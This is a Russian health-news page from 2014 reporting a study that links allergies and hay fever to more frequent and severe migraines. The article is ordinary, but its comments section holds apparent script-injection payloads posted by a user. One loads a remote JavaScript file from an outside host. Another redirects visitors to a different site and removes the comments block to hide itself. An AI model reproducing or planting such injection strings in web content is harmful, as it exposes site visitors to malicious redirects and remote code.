Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Аллергия и мигрень связан...  >>  Аллергия и мигрень связаны!
 
Обратная связь
 

Аллергия и мигрень связаны!

Размер шрифта
12 августа 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Вы аллергик? Если да, то у вас очень велик шанс заработать себе головную боль: согласно недавнему исследованию, аллергия может быть причиной увеличения частоты и силы мигреней.

Аллергия и мигрень связаны!

Исследователи проанализировали данные 6 000 пациентов, страдающих приступами мигрени. Они заполнили специальный опросник в 2008 году в рамках американского проекта по борьбе с мигренью. Две трети участников эксперимента отметили, что у них присутствует какая-либо из разновидностей аллергий, чаще встречалась сезонная аллергия.

На основании полученных данных авторы работы пришли к выводу, что у людей с аллергией или поллинозом на 33% повышена вероятность частых приступов мигрени по сравнению с остальными пациентами. Статья на эту тему была опубликована в журнале «Цефалгия» (Cephalalgia).

Ведущий автор работы, доктор Винсенту Мартину, убежден, что это исследование является одним из первых, которое подчеркивает связь частоты приступов мигрени с раздражением и воспалением слизистой носа, вызванной как аллергическими, так и неалллергическими причинами. Доктор Мартин – профессор Университета Цинциннати и один из руководителей программы изучения головной и лицевой боли.

«Мы не уверены, являются ли аллергия и поллиноз причинами повышенной частоты приступов мигрени или же сами приступы приводят к симптомам аллергии у таких пациентов», – рассказывает доктор Мартин. «Но мы точно можем сказать, что если у вас есть симптомы аллергии, то вы с большей вероятностью будете испытывать частые и сильные головные боли».

Полученные данные могут быть важны в разработке лечения мигреней – так считает Ричард Липтон, один из директоров Центра головной боли в медицинском центре Нью-Йорка. «Нос как один из важных аспектов возникновения и ухудшения мигренозных головных болей долгое время игнорировался учеными», – говорит Липтон. «Если аллергии и поллиноз ухудшают симптомы мигрени, как предполагают результаты исследования, лечение этих состояний может помочь в терапии головной боли у таких пациентов», – отмечает он. Ричард Липтон также является профессором неврологии в Медицинском колледже Альберта Эйнштейна в Университете Иешивы.

Около 12% людей в Америке страдают от мигрени; это заболевание в три раза чаще встречается среди женщин. Аллергии выявлены у огромного количества людей – от четверти и до половины населения Соединенных Штатов. Симптомы обычно включают в себя насморк и зуд в носу.

Таким образом, если вы будете правильно и вовремя лечить аллергию, то сможете избавить себя от лишней головной боли.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:31

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как победить боль ночью и днем   Заболела голова – бейся током! Электрическая стимуляция – новый метод лечения мигрени!   Надежная профилактика аллергии! Аллергикам больше не нужны таблетки   Нежданные причины аллергии  
02 июля 2013Лечить головную боль можно без лекарств! Ученые подключают электричество к нервам! 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Расшифруй головную боль
Аллергия и глаза
Можно ли справиться с аллергией без лекарств?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.